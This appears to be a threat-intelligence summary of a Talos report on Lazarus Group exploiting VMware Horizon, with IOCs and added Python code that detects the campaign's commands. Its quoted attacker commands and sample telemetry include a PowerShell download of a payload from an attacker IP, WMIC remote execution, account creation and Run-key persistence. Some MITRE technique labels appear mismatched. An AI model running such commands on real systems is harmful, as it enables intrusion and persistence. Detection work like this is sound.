Lazarus and the tale of three RATs

Cisco Talos reports Lazarus Group’s global campaign exploiting VMware Horizon vulnerabilities to gain long-term access to energy-sector targets, deploying VSingle, YamaBot, and the newly described MagicRAT implants. The activity shows post-exploitation, lateral movement, credential harvesting, and C2/payload infrastructure overlap with multiple U.S. and international advisories.

Keypoints

  • The Lazarus Group campaign uses the Log4Shell vulnerability on publicly facing VMware Horizon servers as the initial access vector.
  • Targets include energy providers globally, with victims in the United States, Canada and Japan.
  • Adversaries deployed three bespoke implants—VSingle, YamaBot, and MagicRAT—to achieve persistence, data exfiltration, and remote access.
  • Post-exploitation involves reconnaissance, credential harvesting, AD/Impacket-based lateral movement, and the creation of new admin accounts or services.
  • Defense evasion includes disabling Windows Defender, modifying registry/run keys, and startup persistence with scheduled tasks and services.
  • There is overlap with CISA advisories and other vendor reports (AhnLab, Kaspersky, JPCERT) in IOCs, TTPs and shared infrastructure.
  • The operation demonstrates varied human-operated command activity, infrastructure reuse, and multiple implants deployed in sequence to maintain access.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The campaign uses the Log4Shell vulnerability on VMware Horizon public-facing servers as the initial attack vector. Quote: ‘the exploitation of the Log4Shell vulnerability on VmWare Horizon public-facing servers as the initial attack vector [T1190].’
  • [T1021] Remote Services – Lateral movement via remote process creation (WMIC) to execute commands on remote endpoints. Quote: ‘WMIC /node:<Computer_Name> process call create “powershell.exe …”’
  • [T1059.001] PowerShell – Extensive use of PowerShell to download, bypass defenses, and execute payloads. Quote: ‘powershell -exec bypass -Command Get-MpPreference’ and similar commands
  • [T1082] System Information Discovery – Reconnaissance commands to gather system configuration. Quote: ‘System Information Discovery [T1082]’
  • [T1083] File and Directory Discovery – Commands to enumerate files and directories on the host. Quote: ‘dir c:”Program Files (x86)’ and related entries
  • [T1562.001] Impair Defenses – Disabling or bypassing security tools (e.g., Windows Defender). Quote: ‘Deactivate Windows Defender components [T1562]… Get-MpPreference’
  • [T1547.001] Run Keys / Startup Folder – Persistence via registry/run keys and startup folders. Quote: ‘Startup folders’ and ‘reg add … Run’ entries
  • [T1543.003] Create/Modify System Process – Create auto-start services to persist implants. Quote: ‘persisted on the endpoint by creating an auto-start service’
  • [T1053.005] Scheduled Task – Persistence via scheduled tasks (logon/start). Quote: ‘Scheduled task triggered at logon [T1053/005]’
  • [T1005] Ingress Tool Transfer – Downloading payloads from remote locations before execution. Quote: ‘DownloadFile(…)’ commands
  • [T1003.003] OS Credential Dumping: NTDS – Exfiltration of AD data via NTDS.dit. Quote: ‘OS Credential Dumping: NTDS [T1003/003]’
  • [T1033] Account Discovery – Discovery of user accounts on the domain. Quote: ‘User Discovery [T1033]’
  • [T1136] Create Account – Adding new local/admin accounts. Quote: ‘net user /add’
  • [T1090] Proxy – Use of SOCKS proxy (3proxy) to pivot via a proxy. Quote: ‘Proxy [T1090]’
  • [T1560] Archive Collected Data – Compressing and exfiltrating data. Quote: ‘Archive Collected Data [T1560]’
  • [T1070] Indicator Removal on Host – Cleaning up traces and logs. Quote: ‘purge Windows Event Logs [T1070]’
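The commands quoted in the technique list above are all things a defender can match in process-creation telemetry. The following is an added example, not Talos code or tooling: a small rule set written against exactly those quoted commands (WMIC remote process creation, PowerShell execution-policy bypass, MpPreference access, WebClient.DownloadFile, net user /add, and reg add to a Run key), run over constructed Sysmon-style process-creation records. Host names, the password in the net user line, and the Run-key value name are constructed for the example; the technique IDs are kept as labelled in the list above.

```python
"""Command-line detection for the post-exploitation behaviours listed above.

Added example (not from the Talos report). EVENTS are constructed
Sysmon-style process-creation records; the regexes are written against the
commands quoted in the technique list and nothing else.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str        # MITRE technique id, as labelled in the list above
    name: str
    pattern: re.Pattern


RULES = [
    # WMIC remote process creation spawning a command on another host
    Rule("T1021", "wmic-remote-process-create",
         re.compile(r"\bwmic(\.exe)?\b.*\s/node:\S+.*\bprocess\s+call\s+create\b", re.I)),
    # PowerShell launched with the execution policy bypassed
    Rule("T1059.001", "powershell-exec-bypass",
         re.compile(r"\bpowershell(\.exe)?\b.*-(exec|executionpolicy|ep)\s+bypass\b", re.I)),
    # Querying or changing Defender preferences from the command line
    Rule("T1562.001", "defender-preference-tamper",
         re.compile(r"\b(Get|Set|Add)-MpPreference\b", re.I)),
    # WebClient.DownloadFile(...) used to stage a payload (labelled T1005 above)
    Rule("T1005", "webclient-downloadfile",
         re.compile(r"\bDownloadFile\s*\(", re.I)),
    # Local account creation
    Rule("T1136", "net-user-add",
         re.compile(r"\bnet(1)?(\.exe)?\s+user\b.*\s/add\b", re.I)),
    # Run-key persistence via reg.exe
    Rule("T1547.001", "run-key-persistence",
         re.compile(r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I)),
]

# Constructed sample telemetry (host names, account name, password and
# Run-key value are invented; the command shapes follow the quotes above).
EVENTS = [
    {"host": "WS01",
     "cmdline": 'WMIC /node:SRV02 process call create "powershell.exe -exec bypass -Command Get-MpPreference"'},
    {"host": "SRV02",
     "cmdline": "powershell -exec bypass -Command (New-Object Net.WebClient)"
                ".DownloadFile('http://104.155.149.103/mi64.tmp','C:\\Windows\\Temp\\mi64.tmp')"},
    {"host": "SRV02", "cmdline": "net user helpdesk2 Passw0rd! /add"},
    {"host": "SRV02",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\mm.exe"},
    {"host": "WS01", "cmdline": "powershell -Command Get-Process"},   # benign
    {"host": "WS01", "cmdline": "wmic os get caption"},               # benign
]


def match_event(event):
    """Return the sorted, de-duplicated technique ids whose rules fire on one event."""
    return sorted({r.technique for r in RULES if r.pattern.search(event["cmdline"])})


def scan(events):
    """Map each host to the sorted technique ids observed on it (hosts with no hits are omitted)."""
    hits = {}
    for ev in events:
        for tid in match_event(ev):
            hits.setdefault(ev["host"], set()).add(tid)
    return {host: sorted(tids) for host, tids in hits.items()}


def chained_hosts(events, min_techniques=3):
    """Hosts on which at least min_techniques distinct techniques fired.

    Several distinct techniques on one host is a stronger signal than any
    single rule, which matches the sequential, hands-on activity described above.
    """
    return sorted(h for h, tids in scan(events).items() if len(tids) >= min_techniques)


if __name__ == "__main__":
    for host, tids in scan(EVENTS).items():
        print(host, tids)
    print("hosts with a technique chain:", chained_hosts(EVENTS))
```

The rules are deliberately narrow: they fire on the command shapes quoted in the list, not on PowerShell or WMIC in general, so the benign `Get-Process` and `wmic os get caption` records produce no hits. The `chained_hosts` summary is where the value is in practice: a single `Get-MpPreference` may be an administrator, but remote process creation, an execution-policy bypass and Defender preference access on the same host within one event is the pattern the report describes.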

Indicators of Compromise

  • [IP] 104.155.149.103 – Hosting/payload infrastructure used for C2 and file delivery
  • [IP] 84.38.133.145 – Hosting/C2 infrastructure referenced in IOCs
  • [Hash] 586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730 – VSingle
  • [Hash] 226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb – YamaBot
  • [Hash] 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5 – MagicRAT
  • [Hash] 2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e – 3Proxy
  • [File] ntds.dit – OS credential dump data exfiltration context
  • [File] zsam.tmp – part of NTDS dump workflow
  • [URL] http://104.155.149.103/mi64.tmp – payload download URL
  • [URL] http://104.155.149.103/mm.rar – payload archive URL
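To make the indicator list above directly usable, here is an added example (not Talos tooling) that matches the IPs, URLs, SHA-256 hashes and file names listed above against proxy and EDR records. The record format (`<timestamp> key=value ...`), the host names, timestamps and the non-IOC values in the sample lines are constructed for the example; the indicator values themselves are copied from the list above, with hashes normalised to lower case before comparison so that case differences between tools do not cause misses.

```python
"""IOC matching over constructed proxy and EDR log lines.

Added example, not from the Talos report. Indicator values are copied from
the list above; the log lines, hosts and timestamps are constructed.
"""

IOC_IPS = {"104.155.149.103", "84.38.133.145"}
IOC_URLS = {
    "http://104.155.149.103/mi64.tmp",
    "http://104.155.149.103/mm.rar",
}
# SHA-256 values as listed above, lower-cased for comparison
IOC_SHA256 = {
    "586f30907c3849c363145bfdcdabe3e2e4688cbd5688ff968e984b201b474730": "VSingle",
    "226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb": "YamaBot",
    "8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5": "MagicRAT",
    "2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e": "3Proxy",
}
# File names tied to the NTDS dump workflow in the list above
IOC_FILENAMES = {"ntds.dit", "zsam.tmp"}

# Constructed sample records: three proxy lines, three EDR file-observation lines.
# 10.0.0.0/8 and 198.51.100.7 are private/documentation addresses; the all-0 and
# all-1 digests are placeholders for files not in the indicator list.
SAMPLE_LOG = [
    "2022-09-08T10:15:02Z host=WS01 src=10.0.0.21 dst=104.155.149.103 url=http://104.155.149.103/mi64.tmp",
    "2022-09-08T10:15:09Z host=WS01 src=10.0.0.21 dst=198.51.100.7 url=https://example.com/",
    "2022-09-08T10:20:11Z host=SRV02 src=10.0.0.5 dst=84.38.133.145 url=http://84.38.133.145/",
    "2022-09-08T10:16:40Z host=WS01 file=C:\\Windows\\Temp\\mi64.tmp "
    "sha256=586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730",
    "2022-09-08T11:02:13Z host=DC01 file=C:\\Windows\\Temp\\zsam.tmp sha256=" + "0" * 64,
    "2022-09-08T11:05:00Z host=DC01 file=C:\\Windows\\System32\\notepad.exe sha256=" + "1" * 64,
]


def parse_line(line):
    """Parse '<timestamp> key=value key=value ...' into a dict (constructed format)."""
    ts, *fields = line.split()
    rec = {"ts": ts}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def find_iocs(rec):
    """Return (kind, value, label) tuples for every indicator present in one record."""
    hits = []
    dst = rec.get("dst")
    if dst in IOC_IPS:
        hits.append(("ip", dst, "C2/payload host"))
    url = rec.get("url")
    if url in IOC_URLS:
        hits.append(("url", url, "payload download"))
    digest = rec.get("sha256", "").lower()          # normalise case before lookup
    if digest in IOC_SHA256:
        hits.append(("sha256", digest, IOC_SHA256[digest]))
    path = rec.get("file", "")
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()   # basename, either separator
    if name in IOC_FILENAMES:
        hits.append(("filename", name, "NTDS dump artefact"))
    return hits


def scan_lines(lines):
    """Flatten all indicator hits across the given lines, keeping timestamp and host."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        for kind, value, label in find_iocs(rec):
            findings.append({"ts": rec["ts"], "host": rec.get("host"),
                             "kind": kind, "value": value, "label": label})
    return findings


def hits_per_host(findings):
    """Count indicator hits per host, to prioritise which endpoint to look at first."""
    counts = {}
    for f in findings:
        counts[f["host"]] = counts.get(f["host"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f["ts"], f["host"], f["kind"], f["value"], "->", f["label"])
    print(hits_per_host(scan_lines(SAMPLE_LOG)))
```

Two points worth noting when reusing this against real data: the IP match is kept separate from the URL match because the report's hosting infrastructure served more than the two listed paths, so any connection to the listed addresses is worth a look even when the URL differs; and the file-name match on `zsam.tmp` is a weak indicator on its own and is best read together with the NTDS context above, which is why the summary counts hits per host rather than treating every hit as equal.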

Read more: https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html